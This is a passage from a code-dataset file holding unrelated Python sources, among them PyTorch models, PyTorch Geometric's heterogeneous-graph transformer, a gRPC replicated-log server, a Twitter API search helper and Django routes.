numpy.zeros((norb, norb), dtype=numpy.complex128)\n h2e_spa = numpy.zeros((norb, norb, norb, norb), dtype=numpy.complex128)\n h3e_spa = numpy.zeros((norb, norb, norb, norb, norb, norb),\n dtype=numpy.complex128)\n\n for i in range(norb):\n for j in range(norb):\n for k in range(norb):\n for l in range(norb):\n for m in range(norb):\n for n in range(norb):\n h3e_spa[i, j, k, l, m, n] += (i + l) * (j + m) * (\n k + n) * 0.002\n\n wfn = Wavefunction([[nel, sz, norb]])\n wfn.set_wfn(strategy='random')\n\n cProfile.run('test = wfn.apply(tuple([h1e_spa, h2e_spa, h3e_spa]))',\n '3body.profile')\n # test = wfn.apply(tuple([h1e_spa, h2e_spa, h3e_spa]))\n\n # rdm3 = wfn.rdm123(wfn)\n # energy = numpy.tensordot(h3e_spa, rdm3[2],\n # axes=([0, 1, 2, 3, 4, 5], [0, 1, 2, 3, 4, 5]))\n # print(energy)\n import pstats\n profile = pstats.Stats('3body.profile')\n profile.sort_stats('cumtime')\n profile.print_stats(30)\n","sub_path":"profiling/profile_3_body.py","file_name":"profile_3_body.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"43200693","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\nurlpatterns = [\n path('', views.list,name='blog'),\n path('/', views.post, name='post'),\n #path('contact/', views.contact, name='contact'),\n path('register/', views.register, name=\"register\"),\n path('login/',auth_views.LoginView.as_view(template_name=\"pages/login.html\"), name=\"login\"),\n path('logout/',auth_views.LogoutView.as_view(next_page='/'),name='logout'),\n]\n","sub_path":"webpython/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"264584098","text":"# Copyright 2018 The Pontem Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Cloud SQL Replicator setup.\"\"\"\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nfrom google.cloud.pontem.sql import replicator\n\nNAMESPACE_PACKAGES = [\n 'google',\n 'google.cloud'\n]\n\nREQUIRES = [\n 'absl-py>=0.6.1',\n 'future>=0.17.1',\n 'futures>=3.0.5',\n 'google-api-core>=1.6.0',\n 'google-api-python-client>=1.7.6',\n 'google-auth>=1.6.1',\n 'google-auth-httplib2>=0.0.3',\n 'google-cloud-core>=0.28.1',\n 'google-cloud-kms>=0.2.1',\n 'google-cloud-storage>=1.13.0',\n 'google-resumable-media>=0.3.1',\n 'googleapis-common-protos>=1.5.5',\n 'httplib2>=0.12.0',\n 'mysql-connector>=2.1.6',\n 'oauth2client>=4.1.3',\n 'PyYAML>=3.13',\n 'six>=1.11.0',\n]\n\nsetup(\n name='cloudsql-replicator',\n version=replicator.__version__,\n install_requires=REQUIRES,\n packages=find_packages(exclude=['tests']),\n namespace_packages=NAMESPACE_PACKAGES,\n license='Apache 2.0',\n entry_points={\n 'console_scripts': [\n 'sr=google.cloud.pontem.sql.replicator.cli.main:run',\n ]\n }\n)\n","sub_path":"CloudSQLReplicator/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"459945585","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n def __init__(self):\n super().__init__()\n\n # Layer 1\n self.conv1 = nn.Conv2d(3, 48, kernel_size=(11, 11), stride=(4, 4), padding=(2, 2))\n self.mp1 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n self.bn1 = nn.BatchNorm2d(48)\n # Layer 2\n self.conv2 = nn.Conv2d(48, 128, kernel_size=(5, 5), stride=(1, 1), padding=(2, 2))\n self.mp2 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n self.bn2 = nn.BatchNorm2d(128)\n # Layer 3\n self.conv3 = nn.Conv2d(128, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n # Layer 4\n self.conv4 = nn.Conv2d(192, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n # Layer 5\n self.conv5 = nn.Conv2d(192, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n self.mp3 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n\n def forward(self, inputs):\n inputs = F.relu(self.bn1(self.mp1(self.conv1(inputs))))\n inputs = F.relu(self.bn2(self.mp2(self.conv2(inputs))))\n inputs = F.relu(self.conv3(inputs))\n inputs = F.relu(self.conv4(inputs))\n inputs = F.relu(self.mp3(self.conv5(inputs)))\n\n return inputs\n\n\nclass AlexNet(nn.Module):\n def __init__(self, N):\n super().__init__()\n self.N = N\n\n # Encoder\n self.encoder_1 = Encoder()\n self.encoder_2 = Encoder()\n\n # Decoder\n self.fc6_1 = nn.Linear(2*128*6*6, 20)\n self.fc6_2 = nn.Linear(2*128*6*6, 20)\n self.fc7_1 = nn.Linear(40, 20)\n self.fc7_2 = nn.Linear(40, 20)\n self.fc8 = nn.Linear(40, 10)\n\n def forward(self, inputs):\n inputs_1 = self.encoder_1(inputs)\n inputs_2 = self.encoder_2(inputs)\n\n inputs_1 = inputs_1.view(self.N, -1)\n inputs_2 = inputs_2.view(self.N, -1)\n\n temp = torch.cat((inputs_1, inputs_2), dim=1)\n inputs_1 = temp.clone()\n inputs_2 = temp.clone()\n\n inputs_1 = F.relu(self.fc6_1(inputs_1))\n inputs_2 = F.relu(self.fc6_2(inputs_2))\n\n temp = torch.cat((inputs_1, inputs_2), dim=1)\n inputs_1 = temp.clone()\n inputs_2 = temp.clone()\n\n inputs_1 = F.relu(self.fc7_1(inputs_1))\n inputs_2 = F.relu(self.fc7_2(inputs_2))\n\n inputs = torch.cat((inputs_1, inputs_2), dim=1)\n inputs = self.fc8(inputs)\n\n return inputs\n\n\nclass CaffeNet(nn.Module):\n def __init__(self, N):\n super().__init__()\n self.N = N\n\n # Encoder\n self.encoder = Encoder()\n\n # Decoder\n self.fc6 = nn.Linear(128*6*6, 20)\n self.fc7 = nn.Linear(20, 20)\n self.fc8 = nn.Linear(20, 10)\n\n def forward(self, inputs):\n inputs = self.encoder(inputs)\n\n inputs = inputs.view(self.N, -1)\n inputs = F.relu(self.fc6(inputs))\n inputs = F.relu(self.fc7(inputs))\n inputs = self.fc8(inputs)\n\n return inputs\n\n\n# Training\nN = 32\nn_iterations = 100\ninputs = torch.rand(N, 3, 224, 224)\ntargets = torch.randint(10, (N, 1))\ntargets = targets[:, 0]\ntargets = targets.long()\n\nmodel = CaffeNet(N)\nloss_function = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters())\n\n# torch.onnx.export(model, inputs, 'caffenet.onnx', verbose=True) # open in Netron\n\nfor i in range(n_iterations):\n # Forward\n optimizer.zero_grad()\n outputs = model(inputs)\n\n # Loss\n loss = loss_function(outputs, targets)\n\n # Backwards\n loss.backward()\n optimizer.step()\n\n print('iteration:', i, 'loss:', loss.detach().numpy())","sub_path":"example-2.py","file_name":"example-2.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"389614756","text":"# Hexadecimal operations in python with examples\n# import the modules required for the script\nimport base64\n\nExamples = [\"Cat\",\"Mouse\",\"Monitor\"]\n\n\n# display first output line\n# Word\tASCII\tBASE64\nprint(\"Word\\t\",\" ASCII\\t\\t\\t\\t\",\"Base64\")\n# Iterate through the elements in Examples List\nfor ex in Examples:\n\texEnc = \" \"\n\tfor byte in ex.encode():\n\t\texEnc += format(byte,'08b')+\" \"\n\tprint(ex,exEnc,\"\\t\",base64.b64encode(ex.encode()))\n\n","sub_path":"CORE/Cryptography-100/Resources/Hex-AND-OR-XOR-Examples.py","file_name":"Hex-AND-OR-XOR-Examples.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"203182900","text":"# Author: Sebastien Dubois \n#\t\t for ALFA Group, CSAIL, MIT\n\n# The MIT License (MIT)\n# Copyright (c) 2015 Sebastien Dubois\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport matplotlib.pyplot as plt\nfrom iterations_needed import iterationsNeeded\nimport numpy as np\n\nfirst_exp = 4001\nlast_exp = 4050\ntest_name = \"MNIST\"\n\nthreshold = 0.5\nalpha = 0.5\n\n\nmean_iter_needed,q1_iter_needed,median_iter_needed,q3_iter_needed = \\\n\t\t\t\titerationsNeeded(test_name,first_exp,last_exp,threshold,alpha)\n\nabs = 95 + 0.05 * np.asarray(range(101))\n\nfig = plt.figure(figsize=(15,7))\nplt.plot(abs,median_iter_needed,'c')\nplt.plot(abs,q1_iter_needed,'c-.')\nplt.plot(abs[q3_iter_needed < 1000],q3_iter_needed[q3_iter_needed < 1000],'c-.')\nplt.title('Iterations needed')\nplt.xlabel('Percentage of maximum gain')\nplt.ylabel('Number of tested parameters')\nplt.show() ","sub_path":"GCP-HPO/Test/show_iterations_needed.py","file_name":"show_iterations_needed.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"378796342","text":"from typing import Tuple, Dict, Union, Optional, Any\nfrom torch_geometric.typing import NodeType, EdgeType, Metadata\n\nimport re\nimport copy\nimport warnings\nfrom collections import defaultdict, deque\n\nimport torch\nfrom torch.nn import Module\n\nfrom torch_geometric.nn.fx import Transformer\n\ntry:\n from torch.fx import GraphModule, Graph, Node\nexcept ImportError:\n GraphModule = Graph = Node = None\n\n# TODO:\n# * LazyInitialization - Bug: LazyLinear.weight does not support deepcopy yet\n\n\ndef to_hetero(module: Module, metadata: Metadata, aggr: str = \"sum\",\n input_map: Optional[Dict[str, str]] = None,\n debug: bool = False) -> GraphModule:\n r\"\"\"Converts a homogeneous GNN model into its heterogeneous equivalent in\n which node representations are learned for each node type\n :obj:`metadata[0]`, and messages are exchanged between edge type\n :obj:`metadata[1]`, as denoted in the `\"Modeling Relational Data with Graph\n Convolutional Networks\" `_ paper:\n\n .. code-block:: python\n\n import torch\n from torch_geometric.nn import SAGEConv, to_hetero\n\n Net(torch.nn.Module):\n def __init__(self):\n self.lin = Linear(16, 16)\n self.conv = SAGEConv(16, 16)\n\n def forward(self, x, edge_index):\n x = self.lin(x)\n h = self.conv(x, edge_index)\n return torch.cat([x, h], dim=-1)\n\n model = Net()\n\n metadata = (\n ['paper', 'author'],\n [('paper' 'written_by', 'author'), ('author', 'writes', 'paper')],\n )\n\n model = to_hetero(model, metadata)\n model(x_dict, edge_index_dict)\n\n where :obj:`x_dict` and :obj:`edge_index_dict` denote dictionaries that\n hold node features and edge connectivity information for each node type and\n edge type, respectively.\n\n Args:\n module (torch.nn.Module): The homogeneous model to transform.\n metadata (Tuple[List[str], List[Tuple[str, str, str]]]): The metadata\n of the heterogeneous graph, *i.e.* its node and edge types given\n by a list of strings and a list of string triplets, respectively.\n See :meth:`torch_geometric.data.HeteroData.metadata` for more\n information.\n aggr (string, optional): The aggregation scheme to use for grouping\n node embeddings generated by different relations.\n (:obj:`\"sum\"`, :obj:`\"mean\"`, :obj:`\"min\"`, :obj:`\"max\"`,\n :obj:`\"mul\"`). (default: :obj:`\"sum\"`)\n input_map (Dict[str, str], optional): A dictionary holding information\n on the type of input arguments of :obj:`module.forward`.\n In case :obj:`arg` is a node-level argument, then\n :obj:`input_map[key] = 'node'`, and :obj:`input_map[key] = 'edge'`\n otherwise.\n In case :obj:`input_map` is not further specified, will try to\n automatically determine the correct type of input arguments.\n (default: :obj:`None`)\n debug: (bool, optional): If set to :obj:`True`, will perform\n transformation in debug mode. (default: :obj:`False`)\n \"\"\"\n transformer = ToHeteroTransformer(module, metadata, aggr, input_map, debug)\n return transformer.transform()\n\n\nclass ToHeteroTransformer(Transformer):\n\n aggrs = {\n 'sum': torch.add,\n 'mean': torch.add,\n 'max': torch.max,\n 'min': torch.min,\n 'mul': torch.mul,\n }\n\n def __init__(\n self,\n module: Module,\n metadata: Metadata,\n aggr: str = 'sum',\n input_map: Optional[Dict[str, str]] = None,\n debug: bool = False,\n ):\n super().__init__(module, debug)\n self.metadata = metadata\n self.aggr = aggr\n self.input_map = input_map or {}\n assert len(metadata) == 2\n assert len(metadata[0]) > 1 and len(metadata[1]) > 1\n assert aggr in self.aggrs.keys()\n\n def placeholder(self, node: Node, target: Any, name: str):\n # Add a `get` call to the input dictionary for every node-type or\n # edge-type.\n\n input_type = self.input_map.get(name, None)\n if input_type is None and bool(re.search('(edge|adj)', name)):\n input_type = 'edge'\n is_edge_level_placeholder = input_type == 'edge'\n\n if node.type is not None:\n Type = EdgeType if is_edge_level_placeholder else NodeType\n node.type = Dict[Type, node.type]\n\n self.graph.inserting_after(node)\n for key in self.metadata[int(is_edge_level_placeholder)]:\n out = self.graph.create_node('call_method', target='get',\n args=(node, key),\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def get_attr(self, node: Node, target: Any, name: str):\n raise NotImplementedError\n\n def call_message_passing_module(self, node: Node, target: Any, name: str):\n # Add calls to edge type-wise `MessagePassing` modules and aggregate\n # the outputs to node type-wise embeddings afterwards.\n\n # Group edge-wise keys per destination:\n key_name, keys_per_dst = {}, defaultdict(list)\n for key in self.metadata[1]:\n keys_per_dst[key[-1]].append(key)\n key_name[key] = f'{name}__{key[-1]}{len(keys_per_dst[key[-1]])}'\n\n for dst, keys in dict(keys_per_dst).items():\n # In case there is only a single edge-wise connection, there is no\n # need for any destination-wise aggregation, and we can already set\n # the intermediate variable name to the final output name.\n if len(keys) == 1:\n key_name[keys[0]] = f'{name}__{dst}'\n del keys_per_dst[dst]\n\n self.graph.inserting_after(node)\n for key in self.metadata[1]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_module',\n target=f'{target}.{key2str(key)}',\n args=args, kwargs=kwargs,\n name=key_name[key])\n self.graph.inserting_after(out)\n\n # Perform destination-wise aggregation.\n # Here, we aggregate in pairs, popping the first two elements of\n # `keys_per_dst` and append the result to the list.\n for dst, keys in keys_per_dst.items():\n queue = deque([key_name[key] for key in keys])\n i = len(queue) + 1\n while len(queue) >= 2:\n key1, key2 = queue.popleft(), queue.popleft()\n args = (self.find_by_name(key1), self.find_by_name(key2))\n\n new_name = f'{name}__{dst}'\n if self.aggr == 'mean' or len(queue) > 2:\n new_name += f'{i}'\n\n out = self.graph.create_node('call_function',\n target=self.aggrs[self.aggr],\n args=args, name=new_name)\n self.graph.inserting_after(out)\n queue.append(new_name)\n i += 1\n\n if self.aggr == 'mean':\n key = queue.popleft()\n out = self.graph.create_node(\n 'call_function', target=torch.div,\n args=(self.find_by_name(key), len(keys_per_dst[dst])),\n name=f'{name}__{dst}')\n self.graph.inserting_after(out)\n\n def call_module(self, node: Node, target: Any, name: str):\n # Add calls to node type-wise or edge type-wise modules.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_module',\n target=f'{target}.{key2str(key)}',\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def call_method(self, node: Node, target: Any, name: str):\n # Add calls to node type-wise or edge type-wise methods.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_method', target=target,\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def call_function(self, node: Node, target: Any, name: str):\n # Add calls to node type-wise or edge type-wise functions.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_function', target=target,\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def output(self, node: Node, target: Any, name: str):\n # Replace the output by dictionaries, holding either node type-wise or\n # edge type-wise data.\n def _recurse(value: Any) -> Any:\n if isinstance(value, Node):\n return {\n key: self.find_by_name(f'{value.name}__{key2str(key)}')\n for key in self.metadata[int(self.is_edge_level(value))]\n }\n elif isinstance(value, dict):\n return {k: _recurse(v) for k, v in value.items()}\n elif isinstance(value, list):\n return [_recurse(v) for v in value]\n elif isinstance(value, tuple):\n return tuple(_recurse(v) for v in value)\n else:\n return value\n\n if node.type is not None and isinstance(node.args[0], Node):\n output = node.args[0]\n Type = EdgeType if self.is_edge_level(output) else NodeType\n node.type = Dict[Type, node.type]\n else:\n node.type = None\n\n node.args = (_recurse(node.args[0]), )\n\n def init_submodule(self, module: Module, target: str) -> Module:\n # Replicate each module for each node type or edge type.\n has_edge_level_target = bool(\n self.find_by_target(f'{target}.{key2str(self.metadata[1][0])}'))\n\n module_dict = torch.nn.ModuleDict()\n for key in self.metadata[int(has_edge_level_target)]:\n module_dict[key2str(key)] = copy.deepcopy(module)\n if hasattr(module, 'reset_parameters'):\n module_dict[key2str(key)].reset_parameters()\n elif sum([p for p in module.parameters()]) > 0:\n warnings.warn((f\"'{target}' will be duplicated, but its \"\n f\"parameters cannot be reset\"))\n return module_dict\n\n # Helper methods ##########################################################\n\n def map_args_kwargs(self, node: Node,\n key: Union[NodeType, EdgeType]) -> Tuple[Tuple, Dict]:\n def _recurse(value: Any) -> Any:\n if isinstance(value, Node):\n out = self.find_by_name(f'{value.name}__{key2str(key)}')\n if out is None and isinstance(key, tuple):\n out = (self.find_by_name(f'{value.name}__{key[0]}'),\n self.find_by_name(f'{value.name}__{key[-1]}'))\n return out\n elif isinstance(value, dict):\n return {k: _recurse(v) for k, v in value.items()}\n elif isinstance(value, list):\n return [_recurse(v) for v in value]\n elif isinstance(value, tuple):\n return tuple(_recurse(v) for v in value)\n else:\n return value\n\n args = tuple(_recurse(v) for v in node.args)\n kwargs = {k: _recurse(v) for k, v in node.kwargs.items()}\n return args, kwargs\n\n def is_edge_level(self, node: Node) -> bool:\n key = self.metadata[1][0]\n return bool(self.find_by_name(f'{node.name}__{key2str(key)}'))\n\n def has_edge_level_arg_kwarg(self, node: Node) -> bool:\n def _recurse(value: Any) -> bool:\n if isinstance(value, Node):\n return self.is_edge_level(value)\n elif isinstance(value, dict):\n return any([_recurse(v) for v in value.values()])\n elif isinstance(value, (list, tuple)):\n return any([_recurse(v) for v in value])\n else:\n return False\n\n has_edge_level_arg = any([_recurse(value) for value in node.args])\n has_edge_level_kwarg = any([_recurse(v) for v in node.kwargs.values()])\n return has_edge_level_arg or has_edge_level_kwarg\n\n\ndef key2str(key: Union[NodeType, EdgeType]) -> str:\n return '__'.join(key) if isinstance(key, tuple) else key\n","sub_path":"torch_geometric/nn/to_hetero.py","file_name":"to_hetero.py","file_ext":"py","file_size_in_byte":13227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254738745","text":"import os\r\nimport grpc\r\nimport ReplicatedLog_pb2\r\nimport ReplicatedLog_pb2_grpc\r\nfrom concurrent import futures\r\n\r\nlogs = []\r\nslave_host = os.getenv('SLAVE_HOST', 'localhost')\r\nclass Logger(ReplicatedLog_pb2_grpc.PostRequestServiceServicer):\r\n def PostRequest(self, request, context):\r\n logs.append(request.msg)\r\n with grpc.insecure_channel(f'{slave_host}:50052') as channel:\r\n client = ReplicatedLog_pb2_grpc.PostRequestServiceStub(channel)\r\n slave_request = ReplicatedLog_pb2.POST(msg=request.msg)\r\n if client.PostRequest(slave_request).msg == '1':\r\n return ReplicatedLog_pb2.POSTResponse(msg='Master and Slaves have recived msg')\r\n\r\nclass SendLogs(ReplicatedLog_pb2_grpc.GetRequestServiceServicer):\r\n def GetRequest(self, request, context):\r\n with grpc.insecure_channel(f'{slave_host}:50052') as channel:\r\n client = ReplicatedLog_pb2_grpc.GetRequestServiceStub(channel)\r\n slave_request = ReplicatedLog_pb2.GET(msg='1')\r\n\r\n return ReplicatedLog_pb2.GETResponse(data=client.GetRequest(slave_request).data)\r\n\r\ndef serve():\r\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))\r\n ReplicatedLog_pb2_grpc.add_PostRequestServiceServicer_to_server(Logger(), server)\r\n ReplicatedLog_pb2_grpc.add_GetRequestServiceServicer_to_server(SendLogs(), server)\r\n server.add_insecure_port(\"[::]:50051\")\r\n server.start()\r\n server.wait_for_termination()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n serve()\r\n","sub_path":"Master.py","file_name":"Master.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"77344604","text":"import requests # Para enviar solicitudes GET desde la API\nimport os # Para guardar los tokens de acceso y para la gestión de archivos al crear y añadir al conjunto de datos\nimport pandas as pd # Para mostrar los datos después\n# Para parsear las fechas recibidas de twitter en formatos legibles\nimport dateutil.parser\nimport claves #Importar claves\nimport time\n\nCONSUMER_KEY = claves.CONSUMER_KEY\nCONSUMER_SECRET = claves.CONSUMER_SECRET\nBEARER_TOKEN = claves.BEARER_TOKEN\nACCESS_TOKEN = claves.ACCESS_TOKEN\nACCESS_TOKEN_SECRET = claves.ACCESS_TOKEN_SECRET\n\n# guardaremos el token en una \"variable de entorno\"\nos.environ['TOKEN'] = BEARER_TOKEN\n\n#crearemos nuestra función auth () , que recupera el token del entorno\ndef auth():\n return os.getenv('TOKEN')\n\n#A continuación, definiremos una función que tomará nuestro token de portador, \n#lo pasará para su autorización y devolverá los encabezados que usaremos para acceder a la API.\ndef create_headers(bearer_token):\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n# Ahora que podemos acceder a la API, crearemos la solicitud para el punto final que vamos a usar y los parámetros que queremos pasar.\ndef create_url(keyword, start_date, end_date, max_results=500):\n \n #Cuál es el enlace del endpoint al que queremos acceder para recoger datos\n search_url = \"https://api.twitter.com/2/tweets/search/all\"\n\n \"\"\"Los parámetros que ofrece el endpoint y que podemos usar para personalizar la solicitud que queremos enviar.\"\"\"\n \n query_params = {'query': keyword, \n 'start_time': start_date, #AAAA-MM-DDTHH: mm: ssZ (ISO 8601 / RFC 3339)\n 'end_time': end_date, ##AAAA-MM-DDTHH: mm: ssZ (ISO 8601 / RFC 3339)\n 'max_results': max_results, #El número de resultados de búsqueda devueltos por una solicitud está limitado entre 10 y 500 resultados.\n 'expansions': 'author_id,in_reply_to_user_id,geo.place_id',\n 'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',\n 'user.fields': 'id,name,username,created_at,description,public_metrics,verified',\n 'place.fields': 'full_name,id,country,country_code,geo,name,place_type',\n 'next_token': {}}\n return (search_url, query_params)\n\n#Ahora que tenemos la URL, los encabezados y los parámetros que queremos, crearemos una función que unirá todo esto y se conectará al punto final.\n#La función a continuación enviará la solicitud \"GET\" y si todo es correcto (código de respuesta 200), devolverá la respuesta en formato \"JSON\".\ndef connect_to_endpoint(url, headers, params, next_token = None): #next_token está configurado en \"Ninguno\" de forma predeterminada, ya que solo nos importa si existe.\n params['next_token'] = next_token #objeto params recibido de la función create_url\n response = requests.request(\"GET\", url, headers = headers, params = params)\n print(\"Endpoint Response Code: \" + str(response.status_code))\n if response.status_code != 200:\n raise Exception(response.status_code, response.text)\n return response.json()\n\ndef create_df(json_response): # Función para crear df de respuesta a partir del json \n res = []\n #Recorrer en bucle cada uno de los tweets del json\n for tweet in json_response['data']:\n \n # creará una variable para cada uno ya que algunas de las claves podrían no existir para algunos tweets\n\n # 1. Author ID\n if ('author_id' in tweet): \n author_id = tweet['author_id']\n else:\n author_id = \" \"\n \n # 2. Time created\n if ('created_at' in tweet): \n created_at = dateutil.parser.parse(tweet['created_at'])\n else:\n created_at = \" \"\n \n # 3. Geolocation\n if ('place_id' in tweet):\n geo = tweet['geo']['place_id']\n else:\n geo = \" \"\n\n # 4. Tweet ID\n if ('id' in tweet):\n tweet_id = tweet['id']\n else: \n id = \" \"\n\n # 5. Language\n if ('lang' in tweet):\n lang = tweet['lang']\n else: \n lang = \" \"\n\n # 6. Tweet metrics\n if ('retweet_count' in tweet):\n retweet_count = tweet['public_metrics']['retweet_count']\n else:\n retweet_count = \" \"\n \n if ('reply_count' in tweet):\n reply_count = tweet['public_metrics']['reply_count']\n else:\n reply_count = \" \"\n \n if ('like_count' in tweet):\n like_count = tweet['public_metrics']['like_count']\n else:\n like_count = \" \"\n \n if ('quote_count' in tweet):\n quote_count = tweet['public_metrics']['quote_count']\n else:\n quote_count = \" \"\n \n # 7. source\n if ('source' in tweet):\n source = tweet['source']\n else:\n source = \" \"\n \n # 8. Tweet text\n if ('text' in tweet): \n text = tweet['text']\n else:\n text = \" \"\n \n # Reunir todos los datos en una lista\n res.append([author_id, created_at, geo, tweet_id, lang, like_count, quote_count, reply_count, retweet_count, source, text])\n \n df_res = pd.DataFrame(data = res, columns=['author id', 'created_at', 'geo', 'id','lang', 'like_count', 'quote_count', 'reply_count','retweet_count','source','tweet'])\n # Imprime el número de tweets de esta iteración\n return df_res\n\ndef create_df_final(url, headers, json_response): #función para obtener todos los tweets de cada consulta\n df_res = create_df(json_response) #paso como parámetro\n print(\"Número de Tweets añadidos de esta respuesta: \",len(df_res))\n while 'next_token' in json_response[\"meta\"]:\n # Guarda el token para usarlo en la siguiente llamada\n next_token = json_response['meta']['next_token']\n if ('data' in json_response) and len(df_res)< 499500:\n json_response = connect_to_endpoint(url[0], headers, url[1], next_token)\n df_aux = create_df(json_response)\n df_res = pd.concat([df_res,df_aux])\n time.sleep(2) #Se agrega un time.sleep () entre llamadas para asegurarse de que no solo está enviando spam a la API con solicitudes.\n print(\"Número de Tweets añadidos de esta respuesta: \",len(df_res))\n else:\n break\n return df_res \n","sub_path":"twitter_api.py","file_name":"twitter_api.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"29870122","text":"# -*- coding: utf-8 -*-\n\"\"\"\n severus.language\n ----------------\n\n Provides language data wrapper.\n\n :copyright: 2020 Giovanni Barillari\n :license: BSD-3-Clause\n\"\"\"\n\nfrom __future__ import annotations\n\nimport json\nimport re\n\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Tuple, Union\nfrom yaml import SafeLoader as ymlLoader, load as ymlload\n\nfrom .datastructures import GroupData\n\n\nclass Language:\n __slots__ = ['_sources', '_strings', '_groups', '_encoding', 'get']\n _re_nkey = re.compile(r'n\\d+')\n\n def __init__(\n self,\n data_path: Path,\n encoding: str = 'utf8',\n filename_prefix: bool = True,\n watch_changes: bool = False\n ):\n self._sources: List[Dict[str, Any]] = []\n self._strings: Dict[str, str] = {}\n self._groups: Dict[Union[int, str], str] = {}\n self._encoding: str = encoding\n self.get = self._get_reload if watch_changes else self._get_static\n self._load_sources(data_path, filename_prefix)\n\n def _build_key(self, key: str, prefix: Optional[str] = None):\n return f'{prefix}.{key}' if prefix else key\n\n def _load_sources(\n self,\n path: Path,\n filename_prefix: bool = True\n ):\n sources, filename_prefix_applicable = [], False\n if path.is_dir():\n filename_prefix_applicable = filename_prefix\n for file_path in path.iterdir():\n if file_path.suffix in [\n '.json', '.yml', '.yaml'\n ]:\n sources.append(file_path)\n elif path.is_file():\n sources.append(path)\n for source in sources:\n self._sources.append({\n 'path': source,\n 'mtime': source.stat().st_mtime,\n 'prefix': filename_prefix_applicable\n })\n self._load_source(source, filename_prefix_applicable)\n\n def _load_source(\n self,\n path: Path,\n filename_prefix: bool = False\n ):\n ext = path.suffix\n if ext == '.json':\n with path.open(\"rt\", encoding=self._encoding) as f:\n data = json.loads(f.read())\n elif ext in ['.yml', '.yaml']:\n with path.open(\"rt\", encoding=self._encoding) as f:\n data = ymlload(f.read(), Loader=ymlLoader)\n else:\n raise RuntimeError(f'Invalid source format: {path}')\n prefix = filename_prefix and path.stem or None\n self._load_data(data, prefix)\n\n def _load_data(\n self,\n data: Dict[str, Union[Dict, str]],\n prefix: Optional[str] = None\n ):\n for key, val in data.items():\n if 